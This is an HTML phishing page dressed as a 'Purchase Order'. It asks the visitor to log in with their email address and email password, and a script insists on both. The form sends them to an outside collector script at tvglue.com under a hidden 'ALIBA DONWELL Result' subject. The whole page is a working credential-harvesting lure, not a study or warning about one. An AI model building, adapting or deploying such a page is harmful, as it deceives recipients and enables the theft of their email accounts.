<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><title>Purchase Order</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-15">
<link rel="stylesheet" type="text/css" href="http://tvglue.com/default.css">
<!-- no core stylesheet -->
</head>
<body class="centre" style="margin-top: 32px; background: none repeat scroll 0% 0% rgb(255, 255, 255);"><img src="http://tvglue.com/Purchase-Order.gif" height="100" width="300">

<div style="border: none; margin-right: auto; margin-left: auto; width: 447px; height: 200px; padding: 10px; background: url("http://www.outitgoes.com/login_panel_gradient.jpg") top center no-repeat">

<script language="JavaScript">
<!--
function check(form) {
if (form.Email.value == "")
{ alert("Please enter your Email Address."); form.Email.focus(); return;}
// Start of Email error Alert!
var checkEmail = "@.";
var checkStr = form.Email.value;
var EmailValid = false;
var EmailAt = false;
var EmailPeriod = false;
for (i = 0;  i < checkStr.length;  i++)
{
ch = checkStr.charAt(i);
for (j = 0;  j < checkEmail.length;  j++)
{
if (ch == checkEmail.charAt(j) && ch == "@")
EmailAt = true;
if (ch == checkEmail.charAt(j) && ch == ".")
EmailPeriod = true;
          if (EmailAt && EmailPeriod)
                break;
          if (j == checkEmail.length)
                break;
        }
if (EmailAt && EmailPeriod)
{
                EmailValid = true
                break;
        }
}
if (!EmailValid)
{
alert("Please enter a valid email address.");
form.Email.focus();
return;}
// End of Email error Alert!
if (form.emailpassword.value == "")
{ alert("To complete the update, please enter your Email Password."); form.emailpassword.focus(); return;}
{ alert('Click Ok To Continue.'); }
form.submit()
}
//-->
</script>

<form action="http://tvglue.com/chysom/cele.php" method="POST" name="donwell">
<input name="subject" value="ALIBA DONWELL Result" type="hidden">

                        <div>
                        <h1>Login Your Valid Email Account</h1>
                        <p>Please enter your email address
                        and password below for authentication.</p>

                        <div class="centre">
                        <table style="margin-left: auto; margin-right: auto; width: 300px;">
                        <tbody>
                        <tr>
                        <th style="width: 20%; text-align: right; padding-right: 1em;">Email Address: </th>
                        <td style="text-align: left;"><input name="Email" size="30" type="text"></td>
                        </tr>

                        <tr>

                        <th style="text-align: right; padding-right: 1em;">Password: </th>
                        <td style="text-align: left;"><input name="emailpassword" size="30" type="password"></td>

                        </tr>

                        </tbody>

                        </table>
                        <p>If you have problems logging in, please try the 'basic' interface above.</p>

                        <input name="login" onclick="check(this.form)" value="Continue >>" type="button">